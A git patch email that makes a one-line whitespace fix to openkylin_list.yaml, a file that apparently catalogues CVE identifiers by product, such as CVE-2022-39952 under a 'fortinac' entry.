Date: Wed, 15 Mar 2023 07:30:34 +0000 Subject: [PATCH 19/19] update openkylin_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 冉沛筠 --- openkylin_list.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index f488b496..8a5e20bd 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -51,7 +51,7 @@ cve: - CVE-2021-3517 - CVE-2021-3518 - CVE-2021-3537 - fortinac: + fortinac: - CVE-2022-39952 cnvd: kve: -- Gitee